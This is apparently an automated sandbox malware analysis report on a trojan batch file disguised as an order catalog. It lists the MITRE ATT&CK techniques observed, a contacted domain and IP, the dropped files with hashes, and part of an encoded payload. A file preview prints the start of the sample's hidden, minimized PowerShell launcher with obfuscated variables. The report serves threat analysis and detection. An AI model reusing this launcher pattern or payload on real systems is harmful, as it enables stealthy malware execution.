Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Windows Management Instrumentation	1 Scripting	11 Process Injection	11 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Source	Detection	Scanner	Label	Link
ORDER AND CATALOG 01.bat	3%	ReversingLabs

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cohabitais.ru.com	103.83.194.50	true	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.83.194.50	cohabitais.ru.com	United States		132335	NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN	false
23.218.208.109	unknown	United States		6453	AS6453US	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562494
Start date and time:	2024-11-25 16:22:29 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Sample name:	ORDER AND CATALOG 01.bat
Detection:	MAL
Classification:	mal60.troj.winBAT@8/7@1/38
Cookbook Comments:	Found application associated with file extension: .bat

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.95.31.18
Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: ORDER AND CATALOG 01.bat

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xb65c030d, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7863983050932395
Encrypted:	false
SSDEEP:
MD5:	98FB29B53D56186334B6617257BC3625
SHA1:	38D9F60EA7C28EAF5B6A4BBAA9211192B6BDB37B
SHA-256:	B6BF0A881ED68C544543E31B2BFF86B0FA46BD7B3DEC1DF68D5C6D287F709F75
SHA-512:	E8C94A1E0D6C6053D4187A26D80FD0FE2263BFF850E2E8090961A105984DC1B3A48859AF11D2D54706FA062A223B8E003283154669B8E0CA143B10CB3FCE162D
Malicious:	false
Reputation:	unknown
Preview:	.\..... ...............X\...;...{......................0.z...... ...{.......\|M.h.\|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{..................................[3.'.....\|m1................n........\|m..........................#......h.\|.....................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8003
Entropy (8bit):	4.840877972214509
Encrypted:	false
SSDEEP:
MD5:	106D01F562D751E62B702803895E93E0
SHA1:	CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:	81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	18408
Entropy (8bit):	5.466962380449922
Encrypted:	false
SSDEEP:
MD5:	7A7894E2B3EE8C812C142C7814D6B28B
SHA1:	84404E1B107BDC1F24C4C980B42F3E9BD1FD0A27
SHA-256:	6D3D7209A98515D0DE923D2567A297E9FB9B2BDB15A1901CE924B1DF0DF9512F
SHA-512:	3CEF24C69DA0180BC07B0CAF09D6E1C565128AAB08061BAE1C2FECD244DF8147BB5E3CD3ADC6BC6C95425472EE03171AB40DC77AB9C50ED95E7D70C603680C7D
Malicious:	false
Reputation:	unknown
Preview:	@...e................................................@..........H...............o..b~.D.poM...%..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....L.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltzeudcs.yp1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	4C8AD02D11157A29253594D5909AA7D8
SHA1:	F593E5CFDE469A91812C3C65648B02E7C4B41076
SHA-256:	9F0C9D0D662869F01D05CAE5E5700F9C4B9AFCBBAAC42F1829E29111266BA12C
SHA-512:	83DF13C1C6F25858C0FB14B4695FE77439AEEE0B015C73619055DAE1359A05E7B34720F92BD08FDDF40A56145AE8C55FDC51CDBAFFCF3B9A15E78CDDBBF5662B
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F.".. ......{4.......M?..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4...C...M?..Ns..M?......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.HyY.z..............................A.p.p.D.a.t.a...B.V.1.....yY.z..Roaming.@......FW.HyY.z...........................g..R.o.a.m.i.n.g.....\.1.....FW.K..MICROS~1..D......FW.HyY.z..........................j0..M.i.c.r.o.s.o.f.t.....V.1.....GX)w..Windows.@......FW.HyY.z...........................ka.W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.HyY.z....................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....FW.J..Programs..j......FW.HyY.z....................@......!r.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.HGX.w..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.HyY.z....Q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YR072N3QKOFFN5LUN1BZ.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6220
Entropy (8bit):	3.7205877233899276
Encrypted:	false
SSDEEP:
MD5:	4C8AD02D11157A29253594D5909AA7D8
SHA1:	F593E5CFDE469A91812C3C65648B02E7C4B41076
SHA-256:	9F0C9D0D662869F01D05CAE5E5700F9C4B9AFCBBAAC42F1829E29111266BA12C
SHA-512:	83DF13C1C6F25858C0FB14B4695FE77439AEEE0B015C73619055DAE1359A05E7B34720F92BD08FDDF40A56145AE8C55FDC51CDBAFFCF3B9A15E78CDDBBF5662B
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F.".. ......{4.......M?..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4...C...M?..Ns..M?......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.HyY.z..............................A.p.p.D.a.t.a...B.V.1.....yY.z..Roaming.@......FW.HyY.z...........................g..R.o.a.m.i.n.g.....\.1.....FW.K..MICROS~1..D......FW.HyY.z..........................j0..M.i.c.r.o.s.o.f.t.....V.1.....GX)w..Windows.@......FW.HyY.z...........................ka.W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.HyY.z....................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....FW.J..Programs..j......FW.HyY.z....................@......!r.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.HGX.w..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.HyY.z....Q...........

C:\Users\user\AppData\Roaming\Suspendibility.Lum

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	467968
Entropy (8bit):	5.958394687358899
Encrypted:	false
SSDEEP:
MD5:	194358CC55D495BC86BB2B5B4EEE32F5
SHA1:	5607A5FC12B103EDE30272B0277FFE7FBA084918
SHA-256:	392E53746624115DF9D974545E980B1875E031D465A80C6A17DA308468A7863E
SHA-512:	692EF1A5CBB6EF8CBFF4940AEA23C05548BB228090ED9970467E99F19A6CB66FC14FB2E98E5EDA378D5F8347E60BAF999ADFF86D27C778811F4B68809825B76E
Malicious:	false
Reputation:	unknown
Preview:	cQGbcQGbu/0ZDADrAgHMcQGbA1wkBHEBm+sClse5wrJdKHEBm+sCIwSB8aMx7vdxAZvrArb0gelhg7Pf6wKfDesCRTVxAZtxAZu645AbnXEBm+sC4QHrAmr36wL9RTHK6wKeP3EBm4kUC+sCBRjrAvAo0eLrAu0V6wJYLYPBBHEBm+sCr42B+cOoWQR8yOsCtCzrAl4yi0QkBHEBm+sCZJSJw3EBm+sCRf2Bw/FHMwNxAZtxAZu6jVwL8XEBm3EBm4Hy+kqvYesCW7RxAZuB8ncWpJBxAZvrAuQxcQGbcQGbcQGbcQGbiwwQ6wI+uHEBm4kME3EBm3EBm0LrAnzJcQGbgfpQ4gQAddfrArAw6wJdkIlcJAxxAZtxAZuB7QADAADrAuAZcQGbi1QkCHEBm3EBm4t8JARxAZtxAZuJ6+sCId1xAZuBw5wAAADrAhsecQGbU3EBm+sCy6lqQHEBm3EBm4nrcQGbcQGbx4MAAQAAANBoBOsC4QFxAZuBwwABAABxAZtxAZtTcQGb6wLDKInr6wLwZusCrvSJuwQBAADrAgvZ6wLkE4HDBAEAAOsC38txAZtT6wLXI3EBm2r/6wJhuOsC5TqDwgVxAZvrAurjMfZxAZtxAZsxyesCANhxAZuLGnEBm3EBm0HrAmSQ6wKudDkcCnXycQGb6wJGG0brAqMH6wIdPYB8Cvu4ddvrAgGe6wKLt4tECvzrAt1/6wLIdynwcQGbcQGb/9LrAgV16wJrtbpQ4gQAcQGb6wL1wDHA6wJ69nEBm4t8JAxxAZtxAZuBNAfkmtgKcQGb6wLNxoPABHEBm+sCtxQ50HXkcQGbcQGbiftxAZtxAZv/1+sCjj5xAZsMmtgK5MFc7WFDUe8jH+b1G2Xfjq8sWafaZSf1ngUzHmUf5vUbZRnd79hZp9plJ/WqI7PpqGVVNBtlJ38Tz1HvXQROx4emy4slQOojNxspsCJDmWwTXC/iZXNyBcvtvje5tR9O6Zpm

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	ASCII text, with very long lines (7537), with no line terminators
Entropy (8bit):	5.284358476457278
TrID:
File name:	ORDER AND CATALOG 01.bat
File size:	7'537 bytes
MD5:	48eb61ad0c88221857d8cf3e96d58525
SHA1:	724b144e7bbabd011ca04d0d140ede4e47e7ec71
SHA256:	fa9838f5471d4c21d2f8a2f6def009de4bcfad8e5794cc0be33b31e11c5d8fb9
SHA512:	5fb9dd301f5c1dce9a4f6ed005ccf970c3324702b1f5e3d49b130305293c4cc866ae19a2afe2d5dbd970652b533132bc41b5756d8140162d2967582504efeadd
SSDEEP:	96:wnhNRjujCEfr/W1RKU/Ak3Etp45oNUVNx1vlMcC4oxRpOw+Ad+VgaOJor/SyszCd:wnhnrED/qRX18qbx1vOrIyaO66UX6t5o
TLSH:	70F17E25D7902C0CED2B3B95E44289452CE14C1115A458EBC95CA70FB1BE4AFF52EFBB
File Content Preview:	start /min powershell.exe -windowstyle hidden ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemicalization

File Icon


Icon Hash:	9686878b929a9886

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ORDER AND CATALOG 01.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltzeudcs.yp1.psm1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YR072N3QKOFFN5LUN1BZ.temp

C:\Users\user\AppData\Roaming\Suspendibility.Lum

